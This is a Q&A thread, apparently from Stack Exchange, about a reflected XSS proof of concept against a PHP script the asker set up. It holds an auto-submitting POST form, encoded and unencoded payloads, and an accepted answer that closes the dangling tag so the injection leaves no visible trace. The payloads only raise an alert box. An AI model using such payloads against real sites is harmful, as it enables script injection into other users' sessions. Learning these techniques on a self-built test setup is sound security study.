# XSS PoC: Hide Rendered Characters in DOM

Tags: javascript, php, html, xss, client-side-attacks

I've started playing with XSS to better improve my security posture at work. I've been able to successfully exploit a reflected XSS attack using a redirected POST form, but I can't seem to remove the extraneous characters displayed on the page.

I've checked:

[XSS: Character showing in DOM](https://stackoverflow.com/questions/55645910/xss-character-showing-in-dom)

https://security.stackexchange.com/questions/207282/xss-character-showing-in-dom?newreg=61e9890d94d34d0c8818158ba541b117

[How to load javascript on another webpage through XSS?](https://stackoverflow.com/questions/53635341/how-to-load-javascript-on-another-webpage-through-xss)

But none of the suggestions seem to work for me.

My exploit is a basic form, exploiting a PHP server side script I've configured echoing `$_POST['username']` into the value attribute:

```html
<form id=1 method="post" action="http://vulnerable.site.com">
    <input type="hidden" name="username"
    value="&quot;&gt;&lt;script&gt;alert('Hello');&lt;/script&gt;&quot;">
</form>
<script>
    document.getElementById(1).submit();
</script>
```

Unencoded:

```html
<form id=1 method="post" action="http://vulnerable.site.com">
    <input type="hidden" name="username"
    value=""><script>alert('Hello');</script>">
</form>
<script>
    document.getElementById(1).submit();
</script>
```

But this pesky `">` will not die:

[image: Extra characters rendered]

I've tried:

- Several filter evasion techniques by adding additional characters recommended by [OWASP](https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html)
- Escaping the `">` to `&quot;&gt;` - this results in syntax errors, and removing the leading quotes breaks the payload. BUT, based on resources linked above, it seems possible based on comments
- Using CSS selectors to hide the characters in my attack payload (using dev tools, the `">` shows up as `#text` so I thought this might work)

I'm sure it's something silly, but what am I missing? It's clearly possible, but I'm not a skilled web developer (hence the fiddling around). Any feedback or advice would be appreciated!

Answer (score 0, accepted):

I eventually figured it out after hours of trial and error. The idea is to close the dangling tag with a separate tag:

So the previous payload was:

```html
"><script>alert('Hello');</script>
```

Which, after the PHP script parses it, looks like this:

```html
<input type="text" name="username" value="">"> <!-- notice the dangling tag -->
```

After adding a closing input tag, the solution worked:

```html
"><script>alert('Hello');</script><input type="hidden" value="
```

And output from PHP parsing:

```html
<input type="text" name="username" value=""><script>alert('Hello');</script><input type="hidden" value="">
```

Note that the above needs to be HTML encoded to work properly. I omitted it for readability.